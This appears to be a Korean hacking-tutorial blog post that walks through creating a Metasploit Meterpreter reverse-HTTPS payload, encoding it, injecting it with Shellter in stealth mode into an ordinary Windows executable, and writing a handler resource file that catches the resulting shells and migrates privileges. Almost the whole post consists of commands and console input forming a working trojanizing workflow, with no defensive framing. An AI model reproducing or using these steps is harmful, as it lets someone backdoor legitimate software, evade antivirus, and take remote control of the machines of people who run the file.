Metasploit Collabo Shellter
Metasploit 으로 payload 생성
DBMS 실행 후 Metasploit 실행 명령.
root@kali:~# service postgresql start root@kali:~# msfconsole |
Metasploit payload Module 선택 명령.
msf > use palyload/windows/meterpreter/reverse_winhttps |
Module 옵션 선택 명령.
msf palyload(windows/meterpreter/reverse_winhttps) > set lhost 192.168.0.xxx lhost => 192.168.0.xxx msf palyload(windows/meterpreter/reverse_winhttps) > set lport 4444 lport => 4444 |
gernerate help 명령(옵션 참고용)
msf palyload(windows/meterpreter/reverse_winhttps) > generate -h |
payload 생성 명령.
msf palyload(windows/meterpreter/reverse_winhttps) > generate -E -e x86/shikata_ga_nai -t raw -f /root/Desktop/payload |
payload 생성 완료.
shellter payload 커스텀
Auto Mode 로 진입 후 payload 를 삽입할 실행파일 경로를 설정한다.
c h o o s e O p e r a t i o n M o d e - A u t o / M a n u a l ( A / M / H ) : a P E T a r g e t : / r o o t / D e s k t o p / f i l e N a m e . e x e |
Metasploit 으로 생성한 payload 로 커스텀 명령어.
E n a b l e S t e a l t h M o d e ? ( Y / N / H ) : y U s e a l i s t e d p a y l o a d o r c u s t o m ? ( L / C / H ) : c S e l e c t P a y l o a d : / r o o t / D e s k t o p / p a y l o a d I s t h i s p a y l o a d a r e f l e c t i v e D L L l o a d e r ? ( Y / N / H ) : n P r e s s [ E n t e r ] t o c o n t i n u e . . . |
위 과정을 통해 특정 실행 파일에 Metasploit 으로 생성한 payload를 삽입할 수 있다.
Metasploit 리소스 파일 생성
localhandler.rc 파일 작성.
use exploit/multi/handler set payload windows/meterpreter/reverse_winhttps set lhost 192.168.0.xxx set lport 4444 set exitonsession false set autorunscript post/windows/manage/priv_migrate exploit -j |
Metasploit 리소스 파일로 실행하는 명령어.
root@kali:~/Desktop# msfconsole -r localhandler.rc |
Kick Them Out Tool 설치 (0) | 2018.04.16 |
---|---|
kail Applications Automatic Installation (0) | 2018.04.13 |
Hydra & crunch 사용법 (0) | 2018.04.11 |
nmap 사용법 (0) | 2018.04.11 |
TCP idle Scan (0) | 2018.04.10 |